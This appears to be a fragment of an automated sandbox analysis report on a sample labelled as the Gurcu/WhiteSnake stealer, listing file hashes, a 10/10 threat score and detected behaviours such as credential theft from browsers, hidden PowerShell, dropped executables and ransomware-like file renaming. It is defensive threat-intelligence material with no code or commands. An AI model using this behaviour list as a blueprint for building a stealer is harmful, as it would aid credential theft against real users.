Extracted

• • Target

    redirect

  • Size

    6KB

  • MD5

    b59cf59ea016575507e2d639f23030ba

  • SHA1

    5c5fecaf6bf60598cf2643260c5764105716ecfc

  • SHA256

    9c98b2eda2195c59d09c7ca75ee6aee2d3fdcd2a8af1d0a6d6c98149e73c11d1

  • SHA512

    6cedea8e12b23e702fde85fd697d6ab4563896b4509e89afba90e8121ed840beb09d97454afee477abcbf4130fc753b12dad4efcad2f1a28d90f0dbe4143ca79

  • SSDEEP

    192:d7HLxX7777/77QF7nzyrB0Lod4BYCIkKdOBGXwf1:d7r5HYlO0+CIkKdOBGXw9

  Score

  10^/10

  gurcudefense_evasiondiscoveryexecutionransomwarespywarestealerupx

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu

  • Renames multiple (158) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware

  • Command and Scripting Interpreter: PowerShell

    Run Powershell and hide display window.

    execution

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Loads dropped DLL

  • Reads user/profile data of web browsers

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer

  • Checks installed software on the system

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery

  • Legitimate hosting services abused for malware hosting/C2

  • Looks up external IP address via web service

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • UPX packed file

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  behavioral1